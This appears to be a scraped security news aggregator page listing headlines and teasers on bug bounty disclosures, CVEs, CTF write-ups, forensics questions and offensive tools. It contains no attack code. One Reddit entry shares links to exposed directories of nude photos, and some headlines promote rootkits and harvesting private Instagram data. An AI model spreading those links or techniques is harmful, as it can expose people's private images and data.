    Hello guys I am back again. So let’s start talking rn bc I’m tired of everything. Continue reading on Medium »
    [BugBounty] Tips to Find Stored XSS
    Intro Continue reading on InfoSec Write-ups »
    What Is Bug Bounty — How To Make Money As A Hacker — NM Tech blog — Sharing Tech Knowledge
    1) What is Bug Bounty Continue reading on Medium »
    Don’t get caught in the viewer list of any user story of Instagram
    Hi Continue reading on Medium »
    Announcing Qilin V2 Mainnet Bug Bounty Program on Immunefi
    Following our V2 mainnet launch on April 21st, Qilin will initiate a new round of its long-term Bug Bounty Program with a total reward of… Continue reading on Medium »
  • Open

    what is your preferred tool to capture websites?
    Seeking info regarding what tools you have used to capture website pages for investigation purposes. submitted by /u/ATXChimera [link] [comments]
    EnCase 20.2 not detecting local storage or removable media on Add Evidence menu
    Ok n00b question here, having an issue with EnCase 20.2. I just tried reinstalling for the 3rd time now, and I cannot for the life of me figure out why it won't detect my local storage HDD or a USB stick. I can see both in Fast Block SE but when I attempt to locate[add] either as evidence, nothing happens, even after unchecking or leaving the default options to add a local device. Not sure what's going on. https://preview.redd.it/ypfeszyamf491.jpg?width=1920&format=pjpg&auto=webp&s=7ca169e1544ab0bf5e2ac8bcbf612022173a38fe submitted by /u/Termin4lyIns4neLabs [link] [comments]
    Should I be able to create an AXIOM portable case that allows the user to view the file system?
    Just noticed that the file system view is grayed out in the portable case I made, not sure if I missed an option or if it's an inherent limitation with a portable case. submitted by /u/Expensive_Ad6442 [link] [comments]
  • Open

    Several Subdomains Takeover
    Reddit disclosed a bug submitted by 3amii: https://hackerone.com/reports/1591085
    XSS by clicking Jira's link
    GitLab disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1194254 - Bounty: $1130
    Gitlab Pages token theft using service workers
    GitLab disclosed a bug submitted by ehhthing: https://hackerone.com/reports/1439552 - Bounty: $1680
    "External status checks" can be accepted by users below developer access if the user is either author or assignee of the target merge request
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1375393 - Bounty: $610
    Stored XSS on issue comments and other pages which contain notes
    GitLab disclosed a bug submitted by jarij: https://hackerone.com/reports/1398305 - Bounty: $3000
    Reflected XSS on https://www.glassdoor.com/parts/header.htm
    Glassdoor disclosed a bug submitted by 0x7: https://hackerone.com/reports/1073712 - Bounty: $600
    Reflected XSS on https://help.glassdoor.com/gd_requestsubmitpage
    Glassdoor disclosed a bug submitted by 0x7: https://hackerone.com/reports/1094224 - Bounty: $500
    Open redirect on https://www.glassdoor.com/profile/siwa.htm via state parameter
    Glassdoor disclosed a bug submitted by 0x7: https://hackerone.com/reports/1097208 - Bounty: $100
  • Open

    New Technique: Extracting Clear-Text Credentials Directly From Chromium’s Memory
    submitted by /u/jat0369 [link] [comments]
    Using Windows Event Log IDs for Threat Hunting
    submitted by /u/sciencestudent99 [link] [comments]
    People’s Republic of China State-Sponsored Actors Exploit Network Providers and Devices
    submitted by /u/ksr_malware [link] [comments]
    CVE-2022-30287 - Remote Code Execution via Email in Horde Webmail
    submitted by /u/monoimpact [link] [comments]
    Confluence Webshells being dropped into the honeypot
    submitted by /u/Mr-R3b00t [link] [comments]
  • Open

    【安全通报】泛微 E-Office 文件包含漏洞(CNVD-2022-43247...
    近日,CNVD 官方发布了泛微 E-Office 文件包含漏洞,泛微网络官方已发布修复补丁,请广大用户及时下载更新...
    【安全通报】泛微 E-Office SQL注入漏洞(CNVD-2022-43246...
    近日,CNVD 官方发布了泛微 E-Office SQL注入漏洞,泛微网络官方已发布修复补丁,请广大用户及时下载更新。...
  • Open

    【安全通报】泛微 E-Office 文件包含漏洞(CNVD-2022-43247...
    近日,CNVD 官方发布了泛微 E-Office 文件包含漏洞,泛微网络官方已发布修复补丁,请广大用户及时下载更新...
    【安全通报】泛微 E-Office SQL注入漏洞(CNVD-2022-43246...
    近日,CNVD 官方发布了泛微 E-Office SQL注入漏洞,泛微网络官方已发布修复补丁,请广大用户及时下载更新。...
  • Open

    Vulnerability Management in 4 Stages
    Article URL: https://ross-sec-audio.github.io//posts/Vulnerability-Management-in-4-Stages/ Comments URL: https://news.ycombinator.com/item?id=31671924 Points: 1 # Comments: 1
    Risk, Threat, or Vulnerability? What's the Difference
    Article URL: https://www.kennasecurity.com/blog/risk-vs-threat-vs-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31667578 Points: 1 # Comments: 0
    Updates for GKE Authorized Networks After Vulnerability Rewards Program Report
    Article URL: https://cloud.google.com/blog/products/identity-security/updates-coming-for-authorized-networks-and-cloud-runfunctions-on-gke Comments URL: https://news.ycombinator.com/item?id=31662195 Points: 1 # Comments: 0
  • Open

    My #Rightscon2022 keynote address at the Human Rights Journalists Network panel session on Media…
    Whether in Nigeria or somewhere in USA, citizens, and journalists are investigating and documenting human rights abuses. Darnella Fraizer… Continue reading on Medium »
    War in Ukraine / June 7
    The difficult process of postwar reconstruction Continue reading on Medium »
    Image Analysis -Osint Tools
    What is Image Analysis??? Continue reading on Medium »
    Gathering JUICY info from Instagram
    Hey hi everyone, I’m back with another interesting blog. In this blog I will show you how you can get private information of any Instagram… Continue reading on Medium »
  • Open

    SecWiki News 2022-06-08 Review
    浅谈设备指纹技术和应用 by ourren 溯源反制案例分享(二) by ourren SQL脚本自动化审核工具(MYSQL) by ourren 2022云原生安全技术峰会议题Slide by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-08 Review
    浅谈设备指纹技术和应用 by ourren 溯源反制案例分享(二) by ourren SQL脚本自动化审核工具(MYSQL) by ourren 2022云原生安全技术峰会议题Slide by ourren 更多最新文章,请访问SecWiki
  • Open

    [BugBounty] Tips to Find Stored XSS
    Intro Continue reading on InfoSec Write-ups »
  • Open

    Detecting DNS Tunneling using Spark Structured Streaming
    From generating DNS logs to end-to-end implementation of structured streaming Continue reading on InfoSec Write-ups »
  • Open

    Detecting DNS Tunneling using Spark Structured Streaming
    From generating DNS logs to end-to-end implementation of structured streaming Continue reading on InfoSec Write-ups »
  • Open

    Detecting DNS Tunneling using Spark Structured Streaming
    From generating DNS logs to end-to-end implementation of structured streaming Continue reading on InfoSec Write-ups »
  • Open

    企业抵御网络风险 应关注安全平台 | 直击RSAC2022
    随着组织机构在高度互联的数字生态系统中不断深入,如何应对来自四面八方的网络攻击是每一个首席信息安全官们不得不面对的难题。
    FreeBuf | 欧盟强制苹果等设备使用type C接口;信通院发布《软件物料清单实践指南》
    欧洲议会已就拟议的立法达成协议,将强制所有未来的智能手机,包括苹果的iPhone使用通用的USB-C端口进行充电。
    网络资产攻击面管理(CAASM)成安全新解法 | 直击RSAC2022
    如何通过CAASM帮助企业全面盘点网络资产,不断提高资产可见性和云配置,减少安全漏洞风险成为RSAC2022的焦点之一。
    黑客团伙又增“一员”,AI 黑客或很快登场 | 直击RSAC2022
    网络界“奥斯卡”之称的RSAC 2022一直延迟到六月才得举办。今年,施奈尔对于人工智能黑客攻击又有什么新的观点?
    在恶意软件、供应链攻击呈上升趋势下,企业需重新考虑安全策略 | 直击RSAC2022
    作为全球网络安全行业一年一度的盛宴,RSA Conference 2022于6月6-9日正在美国旧金山召开。
    谷歌因侵犯隐私向居民赔偿1 亿美元
    谷歌相册在未经充分的事先通知和同意的情况下,将照片中出现的相似人脸进行分组归类。
  • Open

    Hiding Your Covenant Grunts
    submitted by /u/Diesl [link] [comments]

  • Open

    Ebooks covering chemistry, military, logistics etc
    https://ftp.idu.ac.id/wp-content/uploads/ebook/ submitted by /u/c-rn [link] [comments]
  • Open

    [Windows] Hidden Bind Shell
    Olá! Hoje vou lhe apresentar uma técnica muito interessante de Bind Shell, vamos nos esconder de outros hosts… Continue reading on Medium »
    HackTheBox — Paper [Write-up]
    Today I would like to change the pace and try some Easy challenges from HackTheBox. I picked Paper which is a The Office-themed machine… Continue reading on Medium »
    The Prince0f4llSaiyanz
    Hello and thanks to everyone who took the time to click here and read. My name is Xavier, known a few places as TheMadHatter or… Continue reading on Medium »
  • Open

    Question about hands on practice
    I'm gonna apologize in advance for my noobish question, but could you theoretically build an insecure piece of software or application (telegram like messenger for example) and practice exploitation locally (RCE potentially?) or is there more to it such as os level defense mechanisms that would prevent that? submitted by /u/WarmToiletSeat0 [link] [comments]
  • Open

    DogWalk 0-day vulnerability in Microsoft's Diagnostic Tool
    submitted by /u/CyberMasterV [link] [comments]
    AWS S3 Scanner: Online tool for finding misconfigurations
    submitted by /u/virtue-elliott [link] [comments]
    Network analysis of a targeted phish that got past Defender
    submitted by /u/tmpXXXXXX [link] [comments]
    Open source automated NIST SP 800-53 r5 benchmark for AWS (120+ controls!)
    submitted by /u/bobtbot [link] [comments]
    CVE-2022–29622: (In)vulnerability Analysis
    submitted by /u/JohnKeymanUK [link] [comments]
    Multiple vulnerabilities in Zyxel zysh
    submitted by /u/0xdea [link] [comments]
    Scanning statistics of vulnerable Atlassian Confluence Server(CVE-2022-26134) : Still lots of servers are exposed to the internet.
    submitted by /u/Late_Ice_9288 [link] [comments]
    Building Safe End-to-End Encrypted Services for Business - a Google Workspace perspective
    submitted by /u/ebursztein [link] [comments]
    Observed In The Wild: Atlassian Confluence Server CVE-2022-26134
    submitted by /u/netsecfriends [link] [comments]
  • Open

    How to get into Cyber Security in 2022
    Hello there! I hope you all are well and doing great in your life. Continue reading on Medium »
    Intigriti — XSS Challenge — April 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. So let’s start talking rn bc this writeup will be long. Continue reading on Medium »
    Find 3 bugs in Similarweb.com which din’t pay
    Hi Folks i have find 3 bugs in similarweb which didn’t paid and din’t thanks thank check it out. Continue reading on Medium »
    How smartlook take bug and didn’t paid as they said we will’’ & Also Have Bug Bounty Programme!
    Stored-XSS Admin Takeover From Low User app.smartlook.com Continue reading on Medium »
    Intigriti — XSS Challenge — March 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. This challenge was pretty interesting and one of my fav. Let’s start talking instead of wasting our time. Continue reading on Medium »
    Aurora Inflation Spend Bugfix Review: $6m Payout
    Summary Continue reading on Immunefi »
    . Eu tenho um apelido que você não vai gostar.
    Olá meus amigos, como vocês estão? espero que estejam bem. Continue reading on Medium »
    An unusual way to find XSS injection in one minute
    Hi there! I think that many developers have heard that you can’t trust any user input, and indeed it is. However, there are some places… Continue reading on Medium »
    Bringing back sensitive files from web archives
    Technical details Continue reading on Medium »
  • Open

    Disclosing an unfixed Google Cloud Platform vulnerability post 90-day deadline
    Article URL: https://twitter.com/itspeterc/status/1534205155914264576 Comments URL: https://news.ycombinator.com/item?id=31659573 Points: 2 # Comments: 0
    Microsoft wont say if it will patch critical Windows vulnerability under exploit
    Article URL: https://arstechnica.com/information-technology/2022/06/microsoft-wont-say-if-it-will-patch-critical-windows-vulnerability-under-exploit/ Comments URL: https://news.ycombinator.com/item?id=31658744 Points: 1 # Comments: 0
    Microsoft won’t say if it'll patch critical Windows vulnerability under exploit
    Article URL: https://arstechnica.com/information-technology/2022/06/microsoft-wont-say-if-it-will-patch-critical-windows-vulnerability-under-exploit/ Comments URL: https://news.ycombinator.com/item?id=31652144 Points: 2 # Comments: 1
  • Open

    War in Ukraine / June 6
    Ukraine does not expect an attack from Belarus Continue reading on Medium »
    Top OSINT tools: find sensitive public information before hackers
    Top OSINT tools: find sensitive public information before hackers Continue reading on Medium »
    Bringing back sensitive files from web archives
    Technical details Continue reading on Medium »
  • Open

    SecWiki News 2022-06-07 Review
    工业控制系统安全综述 by ourren ​C-V2X安全研究 by ourren SecWiki周刊(第431期) by ourren OT环境下IoT安全的破局探索 by h4ck01 滥用隐藏属性来攻击 Node.js 生态系统 by ourren 使用LATCH来阻止npm生态的安装时攻击 by ourren 云上典型挖矿团伙浮沉 by Avenger 星链的军事化应用 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-07 Review
    工业控制系统安全综述 by ourren ​C-V2X安全研究 by ourren SecWiki周刊(第431期) by ourren OT环境下IoT安全的破局探索 by h4ck01 滥用隐藏属性来攻击 Node.js 生态系统 by ourren 使用LATCH来阻止npm生态的安装时攻击 by ourren 云上典型挖矿团伙浮沉 by Avenger 星链的军事化应用 by ourren 更多最新文章,请访问SecWiki
  • Open

    Tip on working with E01 images of a Linux system -> accessing an LVM partition (Tsurugi Linux as a forensic workstation)
    submitted by /u/DFIRScience [link] [comments]
    Memory forensics analysis with Volatility | HackTheBox Export | Intro to Blue Team.
    submitted by /u/MotasemHa [link] [comments]
  • Open

    Path traversal, to RCE
    GitLab disclosed a bug submitted by saltyyolk: https://hackerone.com/reports/733072 - Bounty: $12000
    Steal private objects of other projects via project import
    GitLab disclosed a bug submitted by saltyyolk: https://hackerone.com/reports/743953 - Bounty: $20000
    Private objects exposed through project import
    GitLab disclosed a bug submitted by saltyyolk: https://hackerone.com/reports/767770 - Bounty: $20000
    Path traversal in Nuget Package Registry
    GitLab disclosed a bug submitted by saltyyolk: https://hackerone.com/reports/822262 - Bounty: $12000
    Store Admin Page Accessible Without Authentication at http://www.grouplogic.com/ADMIN/store/index.cfm
    Acronis disclosed a bug submitted by ub3rsick: https://hackerone.com/reports/1164854 - Bounty: $250
    Stored Cross Site Scripting at http://www.grouplogic.com/ADMIN/store/index.cfm?fa=disprocode
    Acronis disclosed a bug submitted by ub3rsick: https://hackerone.com/reports/1164853
  • Open

    Atlassian Confluence Server CVE-2022-26134 being actively expoited in the wild
    Article URL: https://www.greynoise.io/blog/observed-in-the-wild-atlassian-confluence-server-cve-2022-26134 Comments URL: https://news.ycombinator.com/item?id=31652889 Points: 14 # Comments: 6
  • Open

    FreeBuf早报 | 意大利巴勒莫市因网络攻击断网;Facebook首次任命CISO
    受遭遇网络攻击的影响,拥有130万人口的巴勒莫市被迫关闭了所有系统,对与市民和游客息息相关的广泛运营服务都产生了巨大影响。
    多年终端安全沉淀,源自支付宝的全链路安全防护建设 | 6月24日19点公开课
    6月24日(周五)晚上19:00,不见不散。
    关键词“转型”,Talon斩获创新沙盒大赛冠军 | 直击RSAC2022
    初创企业Talon Cyber Security公司力克群雄,成功拿下创新沙盒大赛冠军,成为了网络安全行业眼中的“明日之星”。
    云攻击面管理已成大势所趋 | 直击RSAC2022
    云攻击面管理早已成为整个企业安全不可或缺的一部分。
    意大利某市欲关闭系统以抵抗网络攻击
    意大利南部巴勒莫市遭受网络攻击,这给城市的运营、市民以及游客带来了巨大影响。
    记一次水平越权漏洞的利用
    记录了一次水平越权的全过程。
  • Open

    Pandora from HackTheBox — Detailed Walkthrough
    No content preview
    Spring4Shell (SpringShell) Vulnerability
    No content preview
    VLAN Hopping Attack
    No content preview
    NoSQL Injection
    No content preview
    Hacking Nginx: Best ways
    No content preview
    Capture the Ether — Challenge Writeup
    I started concentrating in smart contract security and it is really interesting. Continue reading on InfoSec Write-ups »
  • Open

    Pandora from HackTheBox — Detailed Walkthrough
    No content preview
    Spring4Shell (SpringShell) Vulnerability
    No content preview
    VLAN Hopping Attack
    No content preview
    NoSQL Injection
    No content preview
    Hacking Nginx: Best ways
    No content preview
    Capture the Ether — Challenge Writeup
    I started concentrating in smart contract security and it is really interesting. Continue reading on InfoSec Write-ups »
  • Open

    Pandora from HackTheBox — Detailed Walkthrough
    No content preview
    Spring4Shell (SpringShell) Vulnerability
    No content preview
    VLAN Hopping Attack
    No content preview
    NoSQL Injection
    No content preview
    Hacking Nginx: Best ways
    No content preview
    Capture the Ether — Challenge Writeup
    I started concentrating in smart contract security and it is really interesting. Continue reading on InfoSec Write-ups »
  • Open

    Analysis of MSDT Code Injection Vulnerability(CVE-2022-30190)
    Author: HuanGMz@Knownsec 404 Team Chinese version: https://paper.seebug.org/1913/ 1. WTP doc:https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wintt/windows-troubleshooting-toolkit...
    CVE-2022-30190 MSDT 代码注入漏洞分析
    作者:HuanGMz@知道创宇404实验室 时间:2022年6月7日 English version: https://paper.seebug.org/1914/ 分析一下最近Microsoft Office 相关的 MSDT 漏洞。 1. WTP 框架 文档:https://docs.microsoft.com/en-us/previous-versions/windows/desk...
  • Open

    Analysis of MSDT Code Injection Vulnerability(CVE-2022-30190)
    Author: HuanGMz@Knownsec 404 Team Chinese version: https://paper.seebug.org/1913/ 1. WTP doc:https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wintt/windows-troubleshooting-toolkit...
    CVE-2022-30190 MSDT 代码注入漏洞分析
    作者:HuanGMz@知道创宇404实验室 时间:2022年6月7日 English version: https://paper.seebug.org/1914/ 分析一下最近Microsoft Office 相关的 MSDT 漏洞。 1. WTP 框架 文档:https://docs.microsoft.com/en-us/previous-versions/windows/desk...
  • Open

    Best tool to clone NFC tags from a distance?
    I currently have the ProxMark3 but I need to get the NFC tag really close. Is there any modifications I can do? If not, what product would you recommend? submitted by /u/ErikDz11 [link] [comments]

  • Open

    Misconfigurated login page able to lock login action for any account without user interaction
    Reddit disclosed a bug submitted by h1ugroon: https://hackerone.com/reports/1582778
    2 Cache Poisoning Attack Methods Affect Core Functionality www.exodus.com
    Exodus disclosed a bug submitted by bismillahfortuner: https://hackerone.com/reports/1581454
    Registered users contact information disclosure on salesforce lightning endpoint https://disposal.gsa.gov
    U.S. General Services Administration disclosed a bug submitted by rptl: https://hackerone.com/reports/1443654
  • Open

    You too can be a neuroscientist. Videos.
    Duke Univ. https://histology.oit.duke.edu/MBS/Videos/Neuro/ submitted by /u/inoculatemedia [link] [comments]
    [NSFW] Two nude photo directories that I found
    I did try to do a search to see if these links have come up before, and I didn't find anything. If they, in fact, did, then that's my bad. https://www.iammoon.com/helpers/boobs/ http://zascar.com/files/gifs/boobies/ submitted by /u/VerifiedNSFWThrowawa [link] [comments]
    HTTrack capturing the wrong link when I use the "Capture URL" feature?
    So I'm trying to download webpages from my Canvas portal (Learning Management System that has history of all my grades, assignments, etc.) from my viewpoint logged in for personal record. It uses two-factor authentication so I have to use the "Capture URL" feature. When I enter the provided proxy info into the browser and go the webpage, instead of capturing the main page it keeps capturing a different link. Instead of http://[myuniversity].instructure.com/ it's captures the URL as http://oscp.piki.googl/ with a string of numbers following it. I was wondering what could be going wrong here and how to fix it? I'm using the GUI Windows version of HTTrack. submitted by /u/beyondtheleaves [link] [comments]
  • Open

    Intigriti — XSS Challenge — February 2022  — Bug Bounty Hunting — Writeup
    Hello guys I am back. This challenge was awesome btw. So let’s start talking. Continue reading on Medium »
    Intigriti — XSS Challenge — January 2022 — Writeup
    Hello guys I am back. I was bored so I decided to post some Intigriti’s writeups until new XSS challenge comes now at June 20. So let’s… Continue reading on Medium »
    How I gave rest to company’s email updates service
    Hello everyone, hope you all are doing well Continue reading on Medium »
    Wgel Walkthrough
    Welcome back, folks!! Today presenting one more boot to root kind of box from TryHackMe. It is a beginner-level box with some cool… Continue reading on Medium »
    Hacking Nginx: Best ways
    Nginx is being used in the wild since a while now. We all have seen NGINX name somewhere while coding/hacking. NGINX has always been a… Continue reading on InfoSec Write-ups »
    What I learnt from reading 126* Information Disclosure Writeups.
    Let’s tackle the most valuable and mysterious bug type… Continue reading on Medium »
    AlbusSec:- Penetration-List 07 Cross-Side-Request-Forgery(CSRF) — Sample-2
    Hi Information Security folk, I hope you are well and doing great in your life, Before we go to the next step, You’ll need to learn about… Continue reading on Medium »
    My Pentest Log -21 — (Content-Type Checks)
    Greetings everyone from Porta Platea, Continue reading on Medium »
  • Open

    Shining the Light on Black Basta - documents some of the TTPs employed by a threat actor group who were observed deploying Black Basta ransomware
    submitted by /u/digicat [link] [comments]
    Passwordstate - Revoked its Digicert certificate used to sign the code
    submitted by /u/_r3l0ad3d [link] [comments]
    ESP-IDF Setup Guide - A guide on setting up an environment for ESP32 vulnerability research
    submitted by /u/Gallus [link] [comments]
  • Open

    Microsoft Follina Vulnerability in Windows Can Be Exploited Through Office 365
    Article URL: https://www.wired.com/story/microsoft-follina-vulnerability-windows-office-365/ Comments URL: https://news.ycombinator.com/item?id=31643486 Points: 1 # Comments: 0
    ESP-IDF Setup Guide – Setting up an environment for ESP32 vulnerability research
    Article URL: https://www.elttam.com/blog/esp-idf-setup-guide/ Comments URL: https://news.ycombinator.com/item?id=31637749 Points: 2 # Comments: 0
  • Open

    War in Ukraine / June 3–5
    Ukraine is facing a shortage of everything Continue reading on Medium »
    Ministry of Public Security — Chinese Cyber Espionage Over 19 Million People
    Continue reading on Medium »
    Use of Web Archive In OSINT Investigation ! Go back to past
    Using web archives allows you to see what a web page or site looked like in the past ! Continue reading on Medium »
  • Open

    Can Video Signal Adaptors (eg: displayport to HDMI) compromise your system?
    title. I'm aware how USB devices can compromise your system, and generally try to avoid hardware made from dubious countries (cheap GPUs from China anyone?) I'm in a bit of a pickle over video signal adaptors though. Where I'm from, practically all of these adaptors are manufactured in China. It also seems that some of them do active encoding/decoding between the various video signal types (VGA, HDMI, Displayport). From a purely technical perspective, can these adaptors compromise a system? Edit: Found this - https://www.ehacking.net/2016/07/exploring-vulnerabilities-in-hdmi.html submitted by /u/tappervogine [link] [comments]
    RIPE IP addresses
    This is a crazy question I have a coworker who is convinced that all RIPE IP addresses cary a higher risk than say ARIN or other internet registries? I have a lot of respect for this person but I think this is an incorrect assumption? Thoughts? Thanks submitted by /u/DCbasementhacker [link] [comments]
  • Open

    SecWiki News 2022-06-06 Review
    CVE-2022-30190漏洞的学习一 by 嘿嘿哈哈 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-06 Review
    CVE-2022-30190漏洞的学习一 by 嘿嘿哈哈 更多最新文章,请访问SecWiki
  • Open

    What's everyone using for remote memory acquisition?
    Hello. I say "remote" because most of our laptops are users WFH. What's everyone using to capture a memory image then acquire on remote workstation or server? submitted by /u/antmar9041 [link] [comments]
    What will it take to change the carrier path?
    Hi, everyone! The question is more out of curiosity... I've been in IT industry for about 6 years now. Mainly working as a sys admin. I recently was promoted to cyber security analyst and started taking classes to suit my new position. One of my classes is digital forensic analysis and I have always been fascinated by this field. Not like I am unhappy in my new role and I definitely want to stay in these shoes for some time to build up my experience and knowledge and work on my portfolio. But I am wondering what and where should I start if I will decide to go toward digital forensics? ​ Thank you! submitted by /u/Austronaut1403 [link] [comments]
    Will the Real Msiexec Please Stand Up? Exploit Leads to Data Exfiltration
    🔥 New report out from TheDFIRReport crew! ​ - ManageEngine SupportCenter Plus exploited - LSASS dump from web shell - Plink / RDP / Exfiltration ​ Enjoy! ​ https://t.co/J0Kpho5VU7 submitted by /u/samaritan_o [link] [comments]
  • Open

    Pen #005: Linux Basics (Part 2)
    No content preview
  • Open

    Pen #005: Linux Basics (Part 2)
    No content preview
  • Open

    Pen #005: Linux Basics (Part 2)
    No content preview
  • Open

    CVE-2022-26134 Confluence OGNL RCE 漏洞深入分析和高版本绕过沙箱实现命令回显
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/nCMtSD7QH8ai6fpurJBXTg 漏洞信息 最近 Confluence 官方通报了一个严重漏洞 CVE-2022-26134 : 从漏洞描述来看,这仍然是一个 OGNL 表达式注入漏洞。影响版本如下: from 1.3.0 before 7.4.17 from 7.13.0 before 7.13...
    Follina Microsoft Office RCE with MS-MSDT Protoco
    作者:Y4er 原文链接:https://y4er.com/post/follina-microsoft-office-rce-with-ms-msdt-protocol/ 前言 看推特发了一个好玩的office rce。最早应该是起源于nao_sec的推特 然后又发现了一篇分析文章。 https://doublepulsar.com/follina-a-microsoft-office-c...
  • Open

    CVE-2022-26134 Confluence OGNL RCE 漏洞深入分析和高版本绕过沙箱实现命令回显
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/nCMtSD7QH8ai6fpurJBXTg 漏洞信息 最近 Confluence 官方通报了一个严重漏洞 CVE-2022-26134 : 从漏洞描述来看,这仍然是一个 OGNL 表达式注入漏洞。影响版本如下: from 1.3.0 before 7.4.17 from 7.13.0 before 7.13...
    Follina Microsoft Office RCE with MS-MSDT Protoco
    作者:Y4er 原文链接:https://y4er.com/post/follina-microsoft-office-rce-with-ms-msdt-protocol/ 前言 看推特发了一个好玩的office rce。最早应该是起源于nao_sec的推特 然后又发现了一篇分析文章。 https://doublepulsar.com/follina-a-microsoft-office-c...
  • Open

    一文了解威胁建模
    威胁建模的含义、工作原理、主流威胁建模框架、工具以及最佳实践。
    8大预测分析工具比较
    这些工具包括用于从整个企业收集数据的复杂管道,添加统计分析和机器学习层以对未来进行预测,并将这些见解提炼成有用的摘要,以便业务用户可以对此采取行动。
    盘点:9款身份和访问管理工具
    确保安全访问和身份管理是网络安全态势的两大基础。
    FreeBuf早报 | Confluence 零日漏洞修复程序已发布;陕西一公司直播员工上班过程
    Atlassian解决了 Confluence 服务器和数据中心产品中一个被积极利用的关键远程代码执行漏洞 (CVE-2022-26134)。
    加密货币骗局在美或已造成超10亿美元损失
    2021年1月至2022年3月期间,超46,000名美国人报告受到加密货币诈骗,造成的损失不低于10亿美元。
    2021年,苹果阻止了160万个欺诈用户的应用程序
    苹果 App Store 应用审核团队封杀了超过 34.3 万个违反隐私规定的 iOS应用程序。
    新的Windows搜索零日漏洞可被远程托管恶意软件利用
    攻击者可以通过启动Word文档来加以利用。
    《CCSIP 2022中国网络安全产业全景图》调研启动 | FreeBuf咨询
    因为宏观,所以全面 ,CCSIP2022全景图正式启动。
    紫光展锐曝高危漏洞,可阻止手机联网
    紫光展锐表示将会立即对该漏洞进行修复;谷歌也表示将会在下一个Android安全补丁中修复该漏洞。
    GitLab 通过安全更新修复了帐户接管高危漏洞
    GitLab 为其社区版和企业版产品的多个版本发布了关键安全更新,以解决8个漏洞问题,其中一个为账户接管的高危漏洞。
    亿格云:用SASE解决企业数字化面临的三大挑战 | 网安新势力SOLO发布季
    远程办公变成常态的当下,如何实现企业安全统一管理,网安新势力SOLO发布季告诉你!

  • Open

    How does Docker run Containers Under the Hood
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Heap overflow via HTTP/2 PUSH_PROMISE
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1589847
    KRB-FTP: Security level downgrade
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1590102
  • Open

    Cloudflare observations of Confluence zero day (CVE-2022-26134)
    Article URL: https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/ Comments URL: https://news.ycombinator.com/item?id=31634770 Points: 6 # Comments: 0
    Unauthenticated Remote Code Execution in Atlassian Confluence (CVE-2022-26134)
    Article URL: https://bugalert.org/content/notices/2022-06-02-confluence.html?src=tw Comments URL: https://news.ycombinator.com/item?id=31626703 Points: 1 # Comments: 0
  • Open

    How Attacker could have suffocated the company staff
    Background: Continue reading on Medium »
    If It’s a Feature!!! Let’s Abuse It for $750
    Hello mates, Continue reading on Medium »
    Log Poisoning to Remote Code Execution | LFI | cUrl|
    In this article, we will see how to perform Remote Code Execution through Log Poisoning which is a type of Local File Inclusion. Continue reading on System Weakness »
  • Open

    “It’s Full of Secrets and User-Generated Classified Cyber Attack Information” — An Inside Peek
    A modern whiz-kid child story of the son of an ex-Communist era famous family from Bulgaria up to present day deep from the trenches. Continue reading on Medium »
    Hong Kong police tightening control over citizens on June 4th
    As they did last year, the Hong Kong administration tightened security and warned its residents not to gather to commemorate China’s… Continue reading on Medium »
    Good News Roundup: the OSINT-inspired Geek Edition
    In this week’s OSINT-inspired geek edition of the good news roundup, Russia’s tech industry reels under sanctions, and much more. Continue reading on Medium »
    Why the war? A quantitative answer
    Can looking at Russian and Ukrainian news wires shed light on the question? Continue reading on Medium »
    SPY NEWS: 2022 — Week 22
    Summary of the espionage-related news stories for the Week 22 (29 May-4 June) of 2022. Continue reading on Medium »
  • Open

    Old Blackberry (8300)
    I need to create a forensics copy from an old Blackberry 8300. Any suggestion? Thanks submitted by /u/Zipper_Ita [link] [comments]
    Let's solve challenges - Cellebrite 2022 CTF Writeup
    Despite having had little time, I took part in the lovely #CellebriteCTF last week! Please enjoy my writeup: https://www.dfirblog.com/cellebrite-2022-ctf-writeup/ Feel free to provide any feedback you desire! submitted by /u/samaritan_o [link] [comments]
    Decrypting a password locked .RAR file
    Hey there, I have a .RAR file that contains a backup of a Samsung phone. This file is created using Smart Switch - a Samsung software that creates a backup of the entire phone. The file is about 9GB. My client set a password for the backup, but now they forgot their password. They however, have several decrypted files when they extracted the RAR file a few years back – when they still knew the password. These decrypted files range from jpegs to mp4 and to pdfs. The directories in the RAR file can still be accessed with WinRAR. I can open the folders and see the contents of it including their metadata (i.e. date modified, file type, file size). But when I try to extract or open them, I am prompted to type a password. I know this seems like a long shot, but is there any chance the entire RAR file can be decrypted using some of the decrypted files? submitted by /u/wrappedbubble [link] [comments]
  • Open

    Nidhogg rootkit - An all in one rootkit for all windows 10 versions and windows 11 that can be managed with single hpp file
    submitted by /u/Idov31 [link] [comments]
    Analysis of a large brute force attack campaign against Windows Remote Desktop
    submitted by /u/jwizq [link] [comments]
    Conti RaaS group chat leaked (English translation) about firmware exploit and implant
    submitted by /u/hardenedvault [link] [comments]
    Code for Beating Google ReCaptcha and the funCaptcha using AWS Rekognition
    submitted by /u/ScottContini [link] [comments]
  • Open

    i want to dive into exploit _dev ; do i need to learn Assembly language
    submitted by /u/Doom_Guy777 [link] [comments]
  • Open

    SecWiki News 2022-06-05 Review
    在计算机领域的科研中,最初的创新点从何而来? by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-05 Review
    在计算机领域的科研中,最初的创新点从何而来? by ourren 更多最新文章,请访问SecWiki
  • Open

    Xepor:一款针对逆向工程和安全分析的Web路由框架
    Xepor是一款专为逆向分析工程师和安全研究专家设计的Web路由框架,该工具可以为研究人员提供类似Flask API的功能。
    Tornado:一款功能强大的红队匿名反向Shell
    Tornado是一款功能强大的红蓝队安全研究工具,同时也一款功能强大的匿名反向Shell。
    Java反序列化基础篇-类加载器
